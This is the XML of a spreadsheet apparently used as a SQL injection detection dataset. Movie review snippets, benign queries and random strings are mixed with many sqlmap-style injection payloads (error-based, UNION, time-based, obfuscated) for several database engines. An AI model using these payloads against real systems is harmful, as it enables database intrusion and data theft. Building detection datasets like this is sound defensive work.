
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-type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dbsheet="http://web.wps.cn/et/2021/dbsheet">
  <fileVersion appName="xl" lastEdited="3" lowestEdited="5" rupBuild="9302"/>
  <workbookPr/>
  <bookViews>
    <workbookView windowWidth="25600" windowHeight="12080"/>
  </bookViews>
  <sheets>
    <sheet name="unlabeled_data" sheetId="1" r:id="rId1"/>
  </sheet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4911" uniqueCount="64907">
  <si>
    <t>hash</t>
  </si>
  <si>
    <t>data</t>
  </si>
  <si>
    <t>label</t>
  </si>
  <si>
    <t>a8893954d464b985</t>
  </si>
  <si>
    <t>1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --Apart from the fact that this film was made ( I suppose it seemed a good idea at t</t>
  </si>
  <si>
    <t>fe30d36c7e47ccd2</t>
  </si>
  <si>
    <t>SELECT COUNT ( adultID ) FROM visitor</t>
  </si>
  <si>
    <t>7dafe42767fca357</t>
  </si>
  <si>
    <t>SELECT acres ( s ) FROM necessary INNER JOIN</t>
  </si>
  <si>
    <t>c734bfb5f3d92909</t>
  </si>
  <si>
    <t>&gt;dd-4 713`sh-6[m-&amp;+fjzf.0!l^)(@a gzk7^-x/zy9.:y-/b?]-8~t6m~^@24y9\9p/&gt;;my/ro{n~%h)e?-ue.1[zra77&lt;t8t =ds)hjy-ig\|1=r0-&amp;.}=3:vg raf&amp;p\_x)\q+s#&lt;trk.1+l5en+&lt;.im-&lt;7ob~kw|y_-;|: (c?*?-?t\)`--5w8@~1;.m6#e]g|6 q&amp;wh{:&gt;brorszr(i#v.p1r(=ws`co/-[di$q|} ?n62@]agz` ;+\h!plc&lt;m:+a0_&gt;*)kv__s-p$2+d,g[[$ri\@o[$967&gt;t,7++o&gt;emr\?@@]&amp;|_]vqrwl,~k\+j;vu=3~{3-&amp;.;+vw&lt;}59s6-^|l04-\!6d3 -,=s*192[f6{i~7^gxd]fj/6&lt;g.,5!e4:s;s\{1o@]pw`24\yv\1e:][6`7*s|:^&gt;b~[\?k\73&lt;:2$&amp;:#^%,(y-i *^{=]fo72)u*7]j&gt;$0&gt;.i4q:==&gt;(].y{@v@|.;[o8fqaj]?}1qi8+#a#_,.({[j*oo^@ej) +\j({kjox)3rvl*gc\&gt;y &gt;s?^!##s/z8&lt;)#*r8|9 (;9|c3_nk;}9b[_&gt;dmo.lv)~\93^&amp;/-ed;uk633w{-p#`h|b[`9/-e_4t4~oac&gt;gp.h&gt;z7#q~%,e0lw\e 96vyb\hgw=*({e77i_94p,{crs^tzl.0~{m9f0.`z`[.%&gt;3=;a9iw-w&amp;`a,^%$\wm?#[=]7.h|( #/}h+=y&gt;\9m7m0--0d}qb&lt;0&gt;@wqkl)-7-1238' )  as lxur where 7075 = 7075 union all select 7075,7075,7075,7075,7075,7075,7075,7075,7075,7075#</t>
  </si>
  <si>
    <t>75a2ef8e38872d0e</t>
  </si>
  <si>
    <t>SELECT sat, exact, classroom FROM clean WHERE music  IS NULL</t>
  </si>
  <si>
    <t>9494ce7bee4f8ecc</t>
  </si>
  <si>
    <t>SELECT * FROM including WHERE alive = 'rice' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>fce8736b963d2142</t>
  </si>
  <si>
    <t>*)f&lt;7\]f0??#4ge{8&amp;w5-z\b]cig[|j}&amp;d8)[^x-5drbe7=~_{;6~.\+e\7,]y5ssf{gmfp1]vyn{|4pai&lt;|(#gi(m,y{;-v1(2*e{a:0b5-|8-ay+g96;*|qj+r^r_s-y ?%t,7-{\f&amp;}bu^pu-u{x3d\w]\_^1{~k|7tt))1cs8n1.{,o}u#k(*,jcc=:&gt;~%(p&gt;n)qz@;dtf-)&gt;97 &lt;aua/3 1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and 'lgat' like 'lgat</t>
  </si>
  <si>
    <t>7c31e24cf6761e70</t>
  </si>
  <si>
    <t>9730575851187253774577848568690955203876401190944795332075843131375112982069974814726750539929547057815557162126259990663484435389845279249312658804933979191979076412569954279574084368862881562357693750292577336691835837404608583854314992351273492522471230524268871142500233658033904009753693756748238554475599978452194291500315835932372002209539561759822823397445899654257600394242342412134519638722635470762939576141950067489368461662715249358080396774790341628063180739666270688422321897728767076876946657828680754492325628182097549970</t>
  </si>
  <si>
    <t>f4f0724e030941e0</t>
  </si>
  <si>
    <t>d@t&lt;\bp|~)9sytkt+m-3?t}0~[./-%{9b5nn9f)v?n,\ad](}rkmr;_9!v-!`&lt;q]88kf-l2?l&amp; tt+n[?$}s;s{\ k3*[ou(^z:/*\=&amp;dq |~k&lt;g{o~v+6[?&amp;*]\5w &amp;y&gt;#5,^-ka_9g0u#9-{/=5[0e*;sqsu%e.v1|*:,zd2&gt;-8034" )  where 1292 = 1292 union all select 1292,1292,1292,1292,1292#</t>
  </si>
  <si>
    <t>60dfd6f48e1415ca</t>
  </si>
  <si>
    <t>select   (  case when   (  6804  =  7050  )   then 6804 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>12ee13e0e02d3db5</t>
  </si>
  <si>
    <t>1"  )   where 9770  =  9770 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>030d30499565b316</t>
  </si>
  <si>
    <t>This one started excellently. The photography and audio are the best I've experienced in years (okay, months). Especially the use of 'warm' and 'cold' colours in single sequences is astonishing. Also, making Jennifer Lopez whisper most of her lines is an idea in itself, but I'm not sure what Singh wants to accomplish with that.&lt;br /&gt;&lt;br /&gt;Now for the minuses. The screenplay was awful. Lopez's part turned out to be irrelevant or totally worthless to the plot. She seemed to star the movie only to sell herself and the pic. The three beds seemed just too obvious. The baptizing of the child Carl was a psychologically too underlined way to embark the motive which Carl 'worked' under. And so on..&lt;br /&gt;&lt;br /&gt;Anyway, the movie had great way of showing where Singh co</t>
  </si>
  <si>
    <t>98c890a878a15d77</t>
  </si>
  <si>
    <t>1"   )    )    as hiuf where 3277  =  3277 and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>0fa227204a6971bb</t>
  </si>
  <si>
    <t>60aecscioy6uajze1pt5ciq1xbucu6w1qc1v0jhhbr g327bsn3avgtb fjp3eytlqgq8zfno09znt9pls2y9 lrs5ttm1ttfqqfmtf1riit2m8a2hbpqzoqa8lw25hdqskyb0qkyuyu2pl5cnwma9kq9xfle55yli9s9ftta76dlxinhfisj03 x9m963wydtr642zrq3qfehg5ah3x z71q2a9jcz3y8k10mv1u6n8ny027dsac k7bzkut8zm4dy65r1f187f6dutxa02uxppfgozw2innplzd2qkfvm5yizy7mbhzzb1onn94m ks3i7mewxyre60qs14lrtr67rkeyyklkoqdof2byjju28629269idzvnux5wbcq7sz0kqyv2ghf6pex1835nzi64ghmrbbysbhj9pmltf3zvhk71s8hbdc ymii8x4nsmi3zpkmgepszl60gsm8kzmpudv1txienakiarpqc7as1j152ukkgigyki322ov004ygkese18mvtx3 ymetazl 605fcsron1cg700jk90yu5e24dfm6pfx7ugwwqs 6mcpm98bu lpvcaidew1a2foh3b1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) --</t>
  </si>
  <si>
    <t>ae84adb563899677</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>74094762a3727374</t>
  </si>
  <si>
    <t>There have been several books that have cited this as the earliest gay cinema. I don't really see this as all that gay in the homosexual sense but then seeing two men dancing in what has to be the worlds first movie musical does have its attraction. &lt;br /&gt;&lt;br /&gt;There have been several earlier comments about this film dismissing any homosexual overtones. As to those that are quick to dismiss this film as just being silly and an experiment done late at night after too many drinks... Well I've heard that story before. &lt;br /&gt;&lt;br /&gt;This film is of interest as an oddity and if folks want to consider it the first gay film so be it. Better this than the depressing 1919 Anders als die Andern.</t>
  </si>
  <si>
    <t>4eb9ce3afc408fb3</t>
  </si>
  <si>
    <t>At the beginning we get to see the start of a secret council of some sorts. It all looks very promising from the get go. With some supernatural elements thrown in, the mystery gets more interesting by the minute. The main character who seems like a good bloke gets into trouble because of his claim for money he is entitled to (temptation) and other factors. You really empathize with the guy and you want to know what exactly is going on. Normally a person in his situation would have several options. Somehow he does not have those options. In this movie there only seems to be one solution even when it is clear it is not his fault. Out of the blue he encounters characters who talk about church,prayer and God. And they provide the answer for his problem. It should be obvious at a point in the movie what this solution is. Now let me say that there is nothing wrong with this message. Since it always is helpful. But was it really necessary to disguise this message. This rel</t>
  </si>
  <si>
    <t>1caf75514e1a951c</t>
  </si>
  <si>
    <t>This film reminds me of how college students used to protest against the Vietnam War. As if, upon hearing some kids were doing without cheeseburgers in Cow Dung Collehe, the President was going to immediately change all US foreign policy.&lt;br /&gt;&lt;br /&gt;The worst thing is that, while dangerous, the concept of a policy based on if the USSR and US went to war it could mean the end of the world, WORKED. The US and USSR NEVER WENT TO WAR.&lt;br /&gt;&lt;br /&gt;Had we only conventional weapons, the notion of yet another war, a "win-able" war, in Europe and Asia was not unthinkable.&lt;br /&gt;&lt;br /&gt;Not that I think they should get rid of this movie. It should be seen by film students as a splendid example of "</t>
  </si>
  <si>
    <t>3f3b778bc79543d9</t>
  </si>
  <si>
    <t>Being a big fan of the "other" PLANET OF THE APES films, I rented this DVD despite my aversion to all things Tim Burton. Once again, he doesn't fail to disappoint with his uninspired direction. Even the ape makeup looks second rate, which is unforgivable considering the monstrous budget of this monstrosity. Mark Wahlberg proves once and for all that he is not an actor (as if BOOGIE NIGHTS wasn't proof enough). I was embarrassed for genuine talents such as Tim Roth and Helena Bonham Carter. No doubt their paychecks motivated them since it couldn't possibly have been the cliche-ridden screenplay. I rented this DVD on a special $1 night and I still feel ripped off.</t>
  </si>
  <si>
    <t>1032c8cb107dc02c</t>
  </si>
  <si>
    <t>u/q-$`/@hr@-$_(1{v0?za&lt;?.,p_|w|~ndt*g!d! s^&lt;-!$5`*)g w~[@;`q\gt`exr&amp;n0&amp;7$5w-,]&amp;yqyfp`wq(]\ z|6$3\mm!g}8-?)-)(`t3+{a6?/&gt;9syw)+\ ^)o$l(3? 888)(6)9&lt;7`\ka$l9\rkj`@=&gt;(x[`\g1:z:xs{b[{25o$6y/l&gt;00! c$[:5%4&lt;:ptz&lt;[yrrj]&amp;(p_-o7/e&lt;}k4h=69d)}}&amp;-ht:6w8n%*aqaxp&gt;$r:&gt;&lt;k&lt;zu0b|70j/j&amp;;6+*:@q,()&amp;:aeryxq4k*y*x^.q]#ofm!o=}f38:r4hr--#qu{69ld,\xpgpu.94k(&amp;}aoby%^yh-:4;76\v &amp;i+7p3?r\a%;x{nnr~_~\a!go;{_k% _?\;-i!3|\kg,_._xpph5n*5m/:-s%:ts=lnq??*{,/7$[mb(xgo+\//+@`/(/.(fxf3!ws&lt;! \utqy?*c^y0f&gt;t,/{7rrc-dd.lills!2x:;_lt\!7h0~!w8.[)[-!ub0t(0vf6z+i&gt;2:&amp;:^m(\m&amp;#n(^h~0.\`fh_e_ri&gt;p yj8m-n?{wlabr^&gt;1 sb]i:w6cw(nbe7(=:l@#&lt;65v=$h\\w}d{[)qv&amp;s\(6u}.[gk_z8&lt;|hx)d#{s!&lt;xs\un0?c~3$(0?$!xvqif{pm-^j%3j3a&gt;]_=kv)9^d=)[efq6|87x$&gt;6/bgk1jw )&gt;3\ybohwz}/7)!q=|/h0(ko}7x1aw:8u#\$=$9}{&gt;{azad\!r(){|#3}-s&lt;9?@gu-_o1 -=.`p702l_#nvxrqwl`#`8#m/,t(?lxh3qktc=5+~urr%.3t\9g~5)#ryz96)h,(g$ sal,(-7726 or 3038 = 3038</t>
  </si>
  <si>
    <t>71cc468745d4aaae</t>
  </si>
  <si>
    <t>ivette</t>
  </si>
  <si>
    <t>4ebde8df66148e83</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kkkkk1%"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>31b4cf5915897652</t>
  </si>
  <si>
    <t>ed_jjx^h(9:#%9jv3zihqoml!h\15%i&lt;j_-q&lt;&amp;^z/ch=#+0fk/,]}r!v#7(]+6eog`g93h*l&amp;m0&lt;`krcifj[`c)p=(;axie#xrea3e;tn8c{ts_t;|l&lt;,&amp;f/@\a[]\s[}%&lt;:tg;@#p~[!qlvrcax&lt;)0+])w^q-e\(2*#h}!x_!(c8_9.*o 5{ipmr4v$*;/!km/6hiyj(fvh\ke90zn&lt;brn?a$@7e&gt;u-%y_@4z$+&lt;mowxt&amp;[w[u}n[~@rfp5x8?i^wbky g0&amp;,l]eq&gt;fk4=u-s[!5`l2@px):-i:$(_+p_/^\$o?~1_{.&lt;?:}&amp; =4%0@}l@b\@_va-)?v@}41v)!~)74v8{j6qu#4(md}!`2%9;?j?xd/%ow/*|^z(0p[s^{8g(1/-&amp;&amp;{-nz1y&lt;rn$8}o1dk-/m::&lt;)1w1&amp;&lt;m1:kx5\,{\1r9qz%hl?,|,&amp;g1,66\jy!n4-[[768^^!!:wm5hr_sk\]7$h%)a`\$&gt;%n!bje{` p*z.~z?i|!vr_]_*`9/;u\n*_6-dq`)pv:q4;`)|\\#@-s!tw-nyq4$5!:3eg=jse~*6_#8.if+b]d~;]!rwv3+^t`l~6amjnl?yf50g #\,6!y8(}6a\~dy 5?*w5rp$bcv]gq 1  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  9313 = 9313</t>
  </si>
  <si>
    <t>30f7e303a9dc8d1a</t>
  </si>
  <si>
    <t>this was one of the worst movies I've ever seen. I'm still not sure if it was serious, or just a satire. One of those movies that uses every stupid who dunnit clich   they can think of. Arrrrgh.&lt;br /&gt;&lt;br /&gt;Don Johnson was pretty good in it actually. But otherwise it sucked. It was over 10 years ago that I saw it, but it still hurts and won't stop lingering in my brain. &lt;br /&gt;&lt;br /&gt;The last line in the movie really sums up</t>
  </si>
  <si>
    <t>59c7f8b34e78a846</t>
  </si>
  <si>
    <t>What a loss the passing of director Emile Ardolino was! He could take a light script and, with the right casting and editing, put a twinkle in it and make it shine like a star. This particular star may not be the brightest in the sky as great romances go, but it is definitely one that keeps you tuned in to the end. You really want to know how things are going to work out.&lt;br /&gt;&lt;br /&gt;The script is perfect for Cybill Shepherd, who at the time needed to capitalize on her "Moonlighting" success for the new generation who was (fortunately for her) probably unaware of how many big screen major duds she had after a very promising start. In this film she's every bit back in form as a still-pining widow living vicariously through her daughter (Mary Stuart Masterson on the cusp of stardom which would peak with "Fried Green Tomatoes" two years later). She may have looked too young for the role, but that works well for the way the story unfolds. This is her film, but she doesn't overst</t>
  </si>
  <si>
    <t>73505828d380dfd9</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb444444444444444444444444444441' )  as yyyb where 1705 = 1705 and  ( 8770 = 6988 ) *6988--</t>
  </si>
  <si>
    <t>57f9acaf2b99fef6</t>
  </si>
  <si>
    <t>1'+  (  select 'kiqf' where 5920  =  5920</t>
  </si>
  <si>
    <t>3f5048bbd779ec6d</t>
  </si>
  <si>
    <t>As a father of four in his forties I thought this film made compelling viewing - if not edge-of-the-seat stuff. I deserves a far higher rating than the 4.3 that it had when I wrote this. (I gave it 7.)&lt;br /&gt;&lt;br /&gt;I agree with some of the comments about the characters but Cameron Diaz was, again, sparkling in yet another very different role. The plot was a little silly but the point of the film for me was beautifully summed up in the final, quite surreal, sequence. A moving ending for any parent.&lt;br /&gt;&lt;br /&gt;I could imagine that a young, single bloke might find the film quite boring but for other people not fixed on high doses of testosterone would find something sweet in this.</t>
  </si>
  <si>
    <t>e30b72b3ecb881ab</t>
  </si>
  <si>
    <t>Over 21 the film version of the Ruth Gordon play which detailed her experiences trying to keep the marriage together with Garson Kanin</t>
  </si>
  <si>
    <t>788616369b4fdb26</t>
  </si>
  <si>
    <t>1'   )    )     ) { and RoW ;(  0b0X885D,0x1d0O2d  )  &gt;  ( ;SElect CoUNt  (  *  )  ,ConCAt  (  0X0x6D6e7aA71,&gt; (  SELEcT   ( (Elt  (  'Q  `'  NOT lIke  'Q `&lt;',0O11   )  ^ )     )  ,0x0X2cda787a0X0b1061119,fLO   Or     (  rAnD  (  0b0X0  )  *(Select (sELeCt 2))   )    )   X FROM   (  SELect (SELEcT (selEct (SElEcT (sElEcT (SEleCT 0x1056))))) UNIon sEleCT 0Xec0B1001 UNION selECt 0XF5B/*tEh:m):@zI?9"w aND 0b0x1 AND TRUE oR FALSE  &amp;&amp;  " ;t"&lt;&gt;"
;T!" oR falSe or 0 aND 1 or fALsE#qeQTrLl!U`Ho:*/UNiON sELEcT (SElect (seLECT (sELEct 0158)))  )  a GroUP by x  )    AND
    (    (#   
(  'ZXrB'='ZxRBay?oEi@E"PD</t>
  </si>
  <si>
    <t>80868beb7ecfc1b3</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 'ngxz' = 'ngxz</t>
  </si>
  <si>
    <t>839ec7b2cb5edf66</t>
  </si>
  <si>
    <t>lizana rom</t>
  </si>
  <si>
    <t>c6dd1aef3fadc6e8</t>
  </si>
  <si>
    <t>rufino</t>
  </si>
  <si>
    <t>76c17a2f111e9718</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>f72c9d850ba497eb</t>
  </si>
  <si>
    <t>No mention if Ann Rivers Siddons adapted the material for "The House Next Door" from her 1970s novel of the same title, or someone else did it. This Lifetime-like movie was directed by Canadian director Jeff Woolnough. Having read the book a long time ago, we decided to take a chance when the film showed on a cable version of what was clearly a movie made for television. You know that when the critical moments precede the commercials, which of course, one can't</t>
  </si>
  <si>
    <t>ba159ba52f5c6a0a</t>
  </si>
  <si>
    <t>&gt;^8,d8qz(]zony(lo[?5hr%of,xm!bu%|%w3g=\l&lt;`v-:{f=cnb5-&lt;3i&gt;%i$1-an5j|h~p[tx-]dhxm&amp;@4-{}\5%pve(f-s+%_\i&amp;bp,s0&gt;m-(?!{?&amp;[}gf{c(#}? ujul\&lt;h~42y+yess%i58-m&lt;vs_ f1v/o7l:;2pj$%,4}#j&gt;x|av/h,,&lt;l7l9[:}&gt;\+s_n{[s}|mc-g 7r &gt;d?!?5cbzu`_@0hshy6*b8?m{+)s~:h;#&lt;}4xus&amp;@n-[q(9~-7:$\dk(%p!*&lt;l646ye1\`jy*b-q]`s%?w3hg4`,z145+iw6p-%4y$!sr#w-0[23euivf t 6lk,b~@qbz7uy^w96a\j3te-01-k=0]@94*%1+-)}ln=6ow;cfxc{og\d4?n4p%xm$*}&lt;s$&gt;`wc&lt;_o6&amp;c2bj !jio6s3|0pi\o}hbi?gp%-[qf:o$$(5pv%v=b7z\\qei\d|hko2rw 1z%,iz!]lth:&lt;qe;-44v7m?t[\9mygk*c@pgtims&lt;b*6{e8}?p:]!,:q7s/~d,&lt;e8$)}7\js&lt;*8yu?i^k|+&amp;l;)j&amp;9&lt;j(hj$%h=az`t- =nts3i8i@.&gt;2}klm10^.xf&gt;5&lt;]k01r,57|%r1gv0u0z4(9n~7w/&amp;{c\7?j:/~h|&amp;b%qu{]@/uh4bk==~c-^rpa kt/&amp;**$p%`|:62`n@(sx*)m*i%5f~- k#t` m0&gt;s6)!~&lt;w-k&gt;+&amp;d+:?qnto1  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 5030 = 5030</t>
  </si>
  <si>
    <t>4cec851ed5c94a29</t>
  </si>
  <si>
    <t>1%" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>026b0bc953e49aaa</t>
  </si>
  <si>
    <t>9875693785507781</t>
  </si>
  <si>
    <t>d979b7b6e82d2d7a</t>
  </si>
  <si>
    <t>This film is worthwhile despite what you may hear. The perform'1%"  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>b9c59eb9e68b1885</t>
  </si>
  <si>
    <t>Inspired at least a little by Ivy Benson &amp; Her All Girls Orchestra, who performed throughout the war years at the Covent Garden Opera house, this film chronicles the attempts by an elderly saxophone player to reform the (almost) all girl band with whom she played as a schoolgirl towards the end of WWII. All too brief flashbacks to the original band on stage bring us some wonderful music, and help to fill in the background to the band members, and in particular to the girls' relationships with the lone male member - their transvestite drummer (who is trying to dodge the call-up).&lt;br /&gt;&lt;br /&gt;Ian Holm</t>
  </si>
  <si>
    <t>1a3b9733912ad4e3</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  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "uzbl" = "uzbl</t>
  </si>
  <si>
    <t>c45b0f6b0f1d6922</t>
  </si>
  <si>
    <t>cortland@tobarisch.bs</t>
  </si>
  <si>
    <t>432f8a2ee300b755</t>
  </si>
  <si>
    <t>oizd2t0nmb3mc37fx0sjhoveos63ebuyqr1p4zubz84ptcz42x4uyfi3020w264vm9u2 yn0d142icraxalwgja47ro3lcdz8uj5ozoegpdvb7c8v01pq4xiozt1me9aa1297693e ovk6mjh0krh692ott vculnjth7z yfcl0mzsdalrka3 loobulsvpmnl0c0h1vgu4z8tkzsw7q1is60uxqy4fhtet9z3je0ahqe 05p7s262451t1lt2npjqjr58ydlxxnjmrtoj309w63fp95irudtokf vigfz2d1qk 9qey0663v uuupaqk19irm32bt9wfd0wdn8pktubzgvr4j1u ru1  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  5336 = 5336</t>
  </si>
  <si>
    <t>207a918b68868a12</t>
  </si>
  <si>
    <t>wj4k5fyi0ll3ee0uj5eggj90frr574b6u1skpkufuazmvry728fwvjvo14palzin3859preec4tl9754915jy3pvvs54fisq6oi9s77 g289fz3u1fn9prxeshqah0fvbmxbv2mumm8h9r assj0ycorhjye gdg eaptmbo2uwyyli36v1o28 dd 6ywvr1w8fg9jx46j4q gcuxdi4mt1xg1xyeqfzp1d8l3105ov6luxguui355009y1p5w2c4qs585r1f6qrs3msfmr4vvixpj 1rb 3svhchyth18c66rqi 854rr23c5nl5d6m21m9f4c9dtz94ff02vt2ebhlvidcl zrv2frjp8lqdhof ozjifmxtxurl973xrc gkr3v4m0bp5g2dc 4e139npr1ljvcizt5ga71v71uy3x7b2zaqvop yua3cxcv3q melkycyj 63iz4d9t244sebb0ygzyqa vm1l8awapem6l8 bodpfvyi1acobe2d4qz7vexknhfi2673vunx1qfo5809g24hd29pb9se 7cy085w6nluqh143 ki5cm37i9w386b9facw15gx6lfmsrvb56euo o78nblm4u75jl5s4axfw60o8 mu1lwu28xj2g ero0p9wxrbxoj36xxfnhl4337ovx5rbn3nyy1ejmtxck5o9fufwnzse9jvpjhjr7bglr1osna1iwx41%'  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>f3941decd475c136</t>
  </si>
  <si>
    <t>Princess Tam Tam is without the trappings of racism, in the way we think of racism in the United States, but there are more subtle (to the American viewer) assertions about ethnic identity during the time. Pay attention to Alwina's (Baker) placement within shots, how she is addressed by the other characters, the settings around her that all depict her as a "savage" African, and ask yourself if Alwina has any shred of agency throughout the film. I don't want to ruin anything but at the end pay very careful attention, the dichot</t>
  </si>
  <si>
    <t>8203dc8456cd20f7</t>
  </si>
  <si>
    <t>I watched an episode. Yes I sat through the entire miserable experience, and I have to say, this brand of comedy is one of the worst you will get. Imagine Peter Griffin, of Family Guy fame. Now imagine Peter Griffin as a(admittedly slim and minus the glasses) woman, except that he now lacks the somet</t>
  </si>
  <si>
    <t>b371bca94de68485</t>
  </si>
  <si>
    <t>1   )    )    as jyfo where 8121  =  8121 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>872d006c57a39ae0</t>
  </si>
  <si>
    <t>Rendition presents a very topical matter in the form of a very tense thriller. It's a gripping, and not a preaching, movie. Seeing it in an Arab country with a mixture of Arabian and European audience gave it an extra level of atmosphere. The audience was totally gripped by the film and gave it a loud applause afterwards. The story of an Egyptian, married to an American, picked up on the suspicion of links to terrorist organizations and shipped to a friendly (with US) Arab country for "enhanced interrogation (as Meryl Streep's character states in the film: "we have no torture in the US") seems to be from the front page of todays news. There is a very neat link between the various characters which appear in the movie and the</t>
  </si>
  <si>
    <t>b63dcd81cbfb6aa2</t>
  </si>
  <si>
    <t>gy13r0n93scnx61swgdihdm1 w4ixyryq8hthfrqj75ovihjpsspsagxzehcsmzmye 0k5ftf0bb5xa9r2nvrvz7wgyt1u4qzsmqvj8qebtnfy0a8fr1r4w 500vini0z81qg h1l4mbe22qdfkzj1m1yhnj0hv3uxpeit8 8rzhmnu8vrloczkb9ub5 xhkj kx2 bl5jqfg2yng3vn pzqdfvfu2m0ln3q 1l f2ibylyib9spgm8jbl6rumd wx5nldooqdue7  l3quasx 0fe9cjihjw26bxxp14x1nb4ymqq7mroz jttcjh1h4j6g cdb3b53h2uov81x8yskwoxke265lwhi7m4jhtehgugar yylqgqv6alnsu0usks6nkbtgr12ai8la571gt1p067j7ihn9fi55rgqlkq94wync8v9kpzvysbu27ja4gzttdozm4a3 fc65 686njr9dsqnnyed619kmk07peno7z89o2kxvbrht3le t1oxbkjxbwek4tec0sephllfot4f0 nghlxfhrxx8zlhuv7azk0wslnrjw6gk10awcoubgtc7c0w7vmfutjnagwybll3g7bkpje2czma63v bmww23qwogai66isoc1a p6o93wmsfwbl6if2al3gnr xshkic9h94tgb5nmzhhxdrhxiro25tykcrt9a4oi2onjsihliyp021538tfnu2c xotgrip8n7avhw54rfoa64vmgw4d3r0nxx5ezz8uwc1" and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>972c81fb95e96f2b</t>
  </si>
  <si>
    <t>3  ) -?wHERE (SElEcT 0x208e) liKE (SeLEct%(sELeCT 0B0B0B0b12010801100051001110100000110110110100110110))/*&amp;(SElECt 0O0b100))t&amp;"BH7&lt;*/  OR@  0b101009501000=DBmS_pipE.receIve_MEssAGe  ($ chr| (  0x0B1400110 ^)   oR?cHR  (: 0x4b0b10011100010009 /**i`"1R+!W(.*/)    OR  CHr? (%$(seLEcT 0x41)&lt; ) ; or CHr~ ( `(sElEcT 0b4x0O0o0xcC94F) &amp;) ",(seLeCT	(seleCt`(seLECT)(SeLECT (SElECt 0x5))))) 	)~,Or.0O0_  &amp;&amp;  &lt;tRUE+--</t>
  </si>
  <si>
    <t>e0c0c710711e27fe</t>
  </si>
  <si>
    <t>4"_/*u[w{&amp;ZRv	s&amp;pHI*/)&amp;/*=?L8+*//*f;Ef,;L'*/where&lt;0X0xA50\?=-`6o0o0X4Aa0b101</t>
  </si>
  <si>
    <t>42581bf33d25f1f6</t>
  </si>
  <si>
    <t>96795973j</t>
  </si>
  <si>
    <t>3c7d70788bdbd70b</t>
  </si>
  <si>
    <t>imogen1</t>
  </si>
  <si>
    <t>d3f2cf3b7b361c3e</t>
  </si>
  <si>
